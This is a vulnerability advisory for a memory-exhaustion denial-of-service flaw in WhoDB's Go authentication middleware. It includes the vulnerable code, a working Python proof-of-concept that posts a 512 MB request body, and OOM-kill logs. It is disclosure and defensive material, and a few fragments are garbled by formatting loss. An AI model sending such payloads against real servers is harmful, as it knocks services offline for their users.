A Denial of Service (DoS) vulnerability in the authentication middleware allows any client to cause memory exhaustion by sending large request bodies. The server reads the entire request body into memory without size limits, creating multiple copies during processing, which can lead to Out of Memory conditions.
Affects all versions up to the latest one (v0.43.0).
The vulnerability exists in the AuthMiddleware function in core/src/auth/auth.go. The middleware processes all API requests (/api/*) and reads the entire request body using io.ReadAll without any size limits:
func AuthMiddleware(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r http.Request) {
// No size limit on body reading
body, err := io.ReadAll(r.Body)
// ...
// Creates another copy of the body
r.Body = io.NopCloser(bytes.NewReader(body))
// ...
// Unmarshals the body again, creating more copies
if err := json.Unmarshal(body, &query); err != nil {
return false
}
})
}
The issue is amplified by:
middleware.Timeout(10*time.Minute))docker run -it -p 127.0.0.1:8080:8080 clidey/whodb
import requests
import base64
import json
import time
# Create a sample token
credentials = {
"database": "test"
}
token = base64.b64encode(json.dumps(credentials).encode()).decode()
# Create a large query that will pass initial checks
# Using "Login" operation which is allowed
payload = {
"operationName": "Login",
"variables": {},
# Create a large string (512 MB)
"query": "A" * (512 * 1024 * 1024)
}
headers = {
"Content-Type": "application/json",
"Cookie": f"Token={token}" # or use Authorization header if IsAPIGatewayEnabled
}
url = "http://localhost:8080/api/query" # adjust as needed
print("Sending large payload...")
start = time.time()
try:
response = requests.post(url, json=payload, headers=headers)
print(f"Response status: {response.status_code}")
except Exception as e:
print(f"Request failed: {e}")
print(f"Time taken: {time.time() - start:.2f}s")
[3970241.161574] oom-kill:constraint=CONSTRAINT_NONE,nodemask=(null),cpuset=docker-92dede9aa7833cc0db5d7f780a46f57f0b7d627a15d9d0dd6233cd03544542ec.scope,mems_allowed=0,global_oom,task_memcg=/system.slice/docker-92dede9aa7833cc0db5d7f780a46f57f0b7d627a15d9d0dd6233cd03544542ec.scope,task=core,pid=411856,uid=0
[3970241.161611] Out of memory: Killed process 411856 (core) total-vm:8359408kB, anon-rss:5548564kB, file-rss:0kB, shmem-rss:0kB, UID:0 pgtables:11032kB oom_score_adj:0
/api/*)Any client can send arbitrarily large request bodies to the API endpoints. Due to the multiple copies created during processing and lack of size limits, this can quickly exhaust server memory, potentially affecting all users of the system. The high concurrent request limits and long timeout make this particularly effective for DoS attacks.
Fix considerations:
http.MaxBytesReader{
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-19T15:22:43Z",
"nvd_published_at": null,
"severity": "HIGH"
}